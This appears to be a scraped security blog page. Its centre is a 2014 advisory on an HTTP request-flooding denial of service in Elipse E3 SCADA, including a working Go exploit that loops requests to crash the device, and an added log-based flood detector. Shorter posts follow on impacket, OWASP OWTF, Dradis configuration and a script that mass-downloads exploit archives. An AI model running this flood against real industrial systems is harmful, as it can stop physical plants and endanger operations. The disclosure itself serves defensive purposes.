VSLA Security Advisory FIRE-SCADA-DOS-2013-001- Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

http://seclists.org/fulldisclosure/2014/Jul/69

Subject: Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.
From: Mauro Risonho de Paula Assumpção
Date: Tue, 15 Jul 2014 12:18:35 -0300

VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests, authorized by the customer, we were able to stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is proprietary software.
E3 is a process supervision and control system designed to meet
current requirements of connectivity, flexibility and reliability,
which makes it suitable for use in critical systems (SCADA/PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerability via the
'index.html' page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho () gmail com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go

// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
)

func main() {
	count := 0 // number of requests issued so far
	// fmt.Println("")
	// fmt.Println(" _____.__ ___. .__ __ ")
	// fmt.Println(" _/ ____\__|______ ____\_ |__ |__|/ |_ ______ ")
	// fmt.Println(" \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ ")
	// fmt.Println(" | | | || | \/\ ___/| \_\ \ || | \___ \ ")
	// fmt.Println(" |__| |__||__| \___ >___ /__||__| /____ > ")
	// fmt.Println(" \/ \/ \/ ")
	// fmt.Println(" bits on fire. ")
	fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
	fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
	fmt.Println("29-10-2013 11:42")
	fmt.Println("mauro.risonho () gmail com")
	fmt.Println("Hard lock Dll crash in Windows 2003 SP2 + ")
	fmt.Println("20 requests connections per second")

	// Unbounded loop: one sequential GET per iteration. log.Fatal exits the
	// program on the first connection or read error, i.e. when the target
	// stops answering.
	for {
		count++
		// set ip http://192.168.0.1:1681/index.html ->
		// Elipse 3 http://

		fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
		fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
		fmt.Println("29-10-2013 11:42")
		fmt.Println("mauro.risonho () gmail com")
		fmt.Println("Hard lock Dll crash in Windows 2003 SP2 + ")
		fmt.Println("20 requests connections")

		fmt.Println("Connected Port 1681...Testing")
		fmt.Println("Counter Loops: ", count)

		// Target address is hard-coded (the test host used in the advisory).
		res, err := http.Get("http://192.168.0.1:1681/index.html")
		if err != nil {
			log.Fatal(err)
		}
		body, err := ioutil.ReadAll(res.Body)
		res.Body.Close()
		if err != nil {
			log.Fatal(err)
		}
		fmt.Printf("%s", body)
	}
}

Crash: 20 parallel requests.

Vendor Response:
Because the component in question is an installation script, the vendor
has stated that the attack surface is too small to warrant a fix:

"It would be possible for us to communicate the details of the test, so
we can arrange a hotfix."

VSLA Virtual Security Labs Anywhere recommends installing the hotfix
before putting the hardware/software into a production environment.

Remediation Steps:
No official fix for these issues will be released for Elipse E3.
However, administrators can mitigate them by defining rules in a
web application firewall (WAF) solution.
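As an illustration of the kind of rule the remediation above points at, the following script is an editor-added example (not part of the advisory, and not Elipse code): it reads access-log lines in Common Log Format, as a reverse proxy placed in front of the E3 web port would write them, and reports any client that sends more than a set number of requests for /index.html inside a one-second window. The log lines, the 192.0.2.x client addresses and the timestamps are constructed for the example; the threshold of 10 requests per second is an assumption, chosen below the 20 requests per second the advisory reports as the crash level, so an alert fires before the device is affected. The same function works for any other page path or window length by changing its parameters.

```python
"""Flag HTTP request flooding against a SCADA web page from access-log lines.

Editor-added example; not part of the advisory. Input is assumed to be
Common Log Format written by a reverse proxy in front of the E3 web port,
with lines in chronological order (the order a log file is written in).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common Log Format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return {ip, ts (aware datetime), path, status} or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group("ts"), TS_FMT)
    except ValueError:
        return None
    return {"ip": m.group("ip"), "ts": ts,
            "path": m.group("path"), "status": int(m.group("status"))}


def find_flooders(lines, path="/index.html", max_per_window=10, window_seconds=1.0):
    """Sliding-window rate check per client for one page.

    Returns {client_ip: peak_requests_in_window} for every client that made
    more than max_per_window requests to `path` within window_seconds.
    """
    windows = defaultdict(deque)  # ip -> timestamps of its recent requests
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != path:
            continue
        dq = windows[rec["ip"]]
        dq.append(rec["ts"])
        # Drop requests that fell out of the window; the entry just appended
        # has age 0, so the deque never empties here.
        while (rec["ts"] - dq[0]).total_seconds() >= window_seconds:
            dq.popleft()
        if len(dq) > max_per_window:
            peaks[rec["ip"]] = max(peaks.get(rec["ip"], 0), len(dq))
    return peaks


def format_line(ip, ts, path, status=200):
    """Build one constructed CLF line (sample data for this example only)."""
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {path} HTTP/1.1" {status} 512'


def sample_lines():
    """Constructed traffic: one flooding client, one normal client, and one
    client hammering a different page (ignored while watching /index.html)."""
    base = datetime(2013, 10, 29, 11, 42, 0, tzinfo=timezone.utc)
    events = []
    events += [(base, "192.0.2.10", "/index.html")] * 25                         # burst 1
    events += [(base, "192.0.2.20", "/index.html")]                               # normal client
    events += [(base, "192.0.2.30", "/status.html")] * 12                         # other page
    events += [(base + timedelta(seconds=1), "192.0.2.10", "/index.html")] * 25   # burst 2
    events += [(base + timedelta(seconds=5), "192.0.2.20", "/index.html")]
    events += [(base + timedelta(seconds=10), "192.0.2.20", "/index.html")]
    return [format_line(ip, ts, p) for ts, ip, p in events]


if __name__ == "__main__":
    for ip, peak in find_flooders(sample_lines()).items():
        print(f"flood suspected from {ip}: {peak} requests to /index.html in one second")
```

Run against the constructed sample, only 192.0.2.10 is reported (peak 25 in a window); the client on /status.html is not, because the check is scoped to the page the advisory names. Feeding the same function a real proxy log and emitting the result as a per-source block or rate-limit rule is the WAF counterpart of the advisory's recommendation.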

Vendor Communication Timeline:
10/24/2013 – Vulnerability disclosed
10/29/2013 – Confirmation to release vulnerabilities
? – Advisory published

References
1. http://www.elipse.com.br/port/e3.aspx

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on information
security.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

@firebitsbr

impacket – debian 7 netinstall

Error:

python /usr/local/bin/rdp_check.py <ip>
Traceback (most recent call last):
File "/usr/local/bin/rdp_check.py", line 23, in <module>
from impacket.spnego import *
ImportError: No module named spnego

Install the packages:
easy_install urllib2_kerberos
easy_install httpie-negotiate
easy_install pyOpenSSL

Run:
python /usr/local/bin/rdp_check.py <ip>
Impacket v0.9.11 - Copyright 2002-2014 Core Security Technologies

[*] Access Granted

@firebitsbr

OWASP OWTF Version: 0.45.0, Release: Winter Blizzard + Kali = Error hoppy-1.8.1

Hello.

I have been taking part in the OWASP OWTF project, finding several bugs and issues and suggesting new features.

In another post I will say more about the OWASP OWTF framework, but for now:

python owtf.py http://www.xxx.com

__ ___
/\ \__ /’___\
___ __ __ _\ \ ,_\/\ \__/
/ __`\/\ \/\ \/\ \ \ \/\ \ ,__\
/\ \_\ \ \ \_/ \_/ \ \ \_\ \ \_/
\ \____/\ \___x___/’\ \__\\ \_\
\/___/ \/__//__/ \/__/ \/_/

OWTF Version: 0.45.0, Release: Winter Blizzard

[*] Loading framework please wait..
[*] Loading Config from: /root/owtf/profiles/general/default.cfg ..
[*] Loading Resources from: /root/owtf/profiles/resources/default.cfg ..
[*] Loading net Plugin Order from: /root/owtf/profiles/net_plugin_order/default.cfg ..
[*] Loading web Plugin Order from: /root/owtf/profiles/web_plugin_order/default.cfg ..
[*] The IP address for http://www.xxx.com is: 'x.x.x.x'
[*] The IP address for http://www.xxx.com is: 'x.x.x.x'
[*] WARNING: Tool path not found for: /root/owtf/tools/restricted/hoppy-1.8.1/hoppy-1.8.1
[*]
[*] WARNING!!!: 1 tools could not be found. Some suggestions:
[*] - Define where your tools are here: /root/owtf/profiles/general/default.cfg
Continue anyway? [Y/n]

============================================================

Suggestion:

cd /root/owtf/tools/restricted/hoppy-1.8.1/hoppy-1.8.1

wget --no-check-certificate http://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2; bunzip2 *; tar xvf *; rm -f *.tar 2> /dev/null

(--no-check-certificate only makes wget skip the certificate check that fails in the error below; it does not make the downloaded archive any more trustworthy.)

============================================================

Error:

wget http://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2; bunzip2 *; tar xvf *; rm -f *.tar 2> /dev/null
--2014-06-03 18:09:52-- http://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2
Resolving labs.portcullis.co.uk (labs.portcullis.co.uk)... 77.75.105.66
Connecting to labs.portcullis.co.uk (labs.portcullis.co.uk)|77.75.105.66|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2 [following]
--2014-06-03 18:09:53-- https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2
Connecting to labs.portcullis.co.uk (labs.portcullis.co.uk)|77.75.105.66|:443... connected.
ERROR: The certificate of `labs.portcullis.co.uk' is not trusted.
bunzip2: Can't open input file *: No such file or directory.
tar: *: Cannot open: No such file or directory

@firebitsbr

Changing the IP and Port of the Dradis Server on Kali

If you are going to use Dradis (http://dradisframework.org/), you will usually look in the project's official documentation (http://dradisframework.org/documentation.html) when you want to change some setting.

The problem is when the install has been heavily modified (via git), as the Kali team does, for example.

So either you ask on the forum hoping to find someone who has already been through this, or you do what I did and look in the Dradis code itself inside Kali.

And it worked. I will revise this post in the future, but so as not to waste time, have a look:

This gem is throwing an error, but that is no problem for now:

Gem Error
/usr/lib/dradis/server/vendor/bundle/ruby/1.9.1/gems/RedCloth-4.2.8/lib/redcloth.rb:10: Use RbConfig instead of obsolete and deprecated Config.

Start Server
/etc/init.d/dradis start

Open with VIM at:
/usr/lib/dradis/server/script/rails

#!/usr/bin/env ruby
# vim /usr/lib/dradis/server/script/rails
# This command will automatically be run when you run "rails" with Rails 3 gems i$
# (a trailing "$" marks where vim cut off the display of a long line in this listing)

require 'rubygems'
require 'rails/commands/server'
require 'rack'
require 'webrick'
require 'webrick/https'

module Rails
  # Dradis overrides the Rails server defaults so WEBrick listens on a fixed
  # host/port and serves over HTTPS. The three lines "class Server ...",
  # "def default_options" and "super.merge({" were lost when this page was
  # extracted (the "<" was read as a tag) and are reconstructed here from the
  # matching "})" / "end" lines that follow.
  class Server < ::Rack::Server
    def default_options
      super.merge({
        :Port => 8080,
        #:Port => 3004,
        #:Host => "127.0.0.1",
        :Host => "192.168.0.22",
        # hopefully this closes #17
        # ref: http://stackoverflow.com/questions/1156759/
        :DoNotReverseLookup => nil,
        :environment => (ENV['RAILS_ENV'] || "development").dup,
        :daemonize => false,
        :debugger => false,
        :pid => File.expand_path("tmp/pids/server.pid"),
        :config => File.expand_path("config.ru"),
        :SSLEnable => true,
        :SSLVerifyClient => OpenSSL::SSL::VERIFY_NONE,
        :SSLPrivateKey => OpenSSL::PKey::RSA.new(
          File.open(File.expand_path('../../config/ssl/server.key.i$
        :SSLCertificate => OpenSSL::X509::Certificate.new(
          File.open(File.expand_path('../../config/ssl/server.crt', $
        :SSLCertName => [["CN", WEBrick::Utils::getservername]]
      })
    end
  end
end

Change from:

:Port => 3004,
:Host => "127.0.0.1",

To (or whichever IP or port you prefer; note that binding to a LAN address instead of 127.0.0.1 makes the server reachable from other hosts on that network):

:Port => 8081,
:Host => "192.168.0.10",

Save the file.

Stop the server:
/etc/init.d/dradis stop

Start the server again:
/etc/init.d/dradis start

Done! Now just test it on a VM or on your own machine.

@firebitsbr

"Quick, N00b and Dirty" shell script to download the YY-MM exploit archives from PacketStorm

I will revise and improve it later, but I needed to do it simply and quickly.

#!/bin/bash
# Mauro Risonho de Paula Assumpção AKA firebits
# Auto Downloader exploits PacketStormSecurity.net
# Rev01
#
# Monthly archives are named YYMM-exploits.tgz under a directory of the same
# name. Generating the URLs in a loop keeps every month's directory and file
# name in step (the hand-written list this replaces had mismatched names for
# several months).

for yy in 05 06 07 08 09 10 11 12; do
  echo "Year 20${yy} - packetstormsecurity"
  echo "...downloading"
  for mm in 01 02 03 04 05 06 07 08 09 10 11 12; do
    wget "http://dl.packetstormsecurity.net/${yy}${mm}-exploits/${yy}${mm}-exploits.tgz"
  done
done

@firebitsbr